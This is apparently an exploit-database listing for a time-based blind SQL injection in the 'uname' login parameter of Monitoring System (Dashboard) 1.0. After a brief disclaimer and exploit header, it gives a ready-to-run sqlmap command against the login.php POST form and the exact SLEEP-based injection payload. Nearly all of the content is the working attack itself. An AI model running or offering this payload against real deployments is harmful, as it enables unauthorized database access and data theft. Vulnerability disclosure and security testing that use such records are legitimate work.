Monitoring system (dashboard) 1.0 uname sql injection Vulnerability / Exploit
Exploits / Vulnerability Discovered : 2021-03-12 |
Type : webapps |
Platform : php
This exploit / vulnerability Monitoring system (dashboard) 1.0 uname sql injection is for educational purposes only and if it is used you will do on your own risk!
[+] Code ...
# Exploit Title: Monitoring System (Dashboard) 1.0 - 'uname' SQL Injection
# Exploit Author: Richard Jones
# Date: 2021-01-26
# Vendor Homepage:
# Software Link:
# Version: 1.0
# Tested On: Windows 10 Home 19041 (x64_86) + XAMPP 7.2.34
1. Run sqlmap
"sqlmap -u "http://localhost/asistorage/login.php" --data="uname=a&upass=w&btnlogin=" --batch
Parameter: uname (POST)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: uname=a' AND (SELECT 4539 FROM (SELECT(SLEEP(5)))zdoW) AND 'YWTS'='YWTS&upass=w&btnlogin=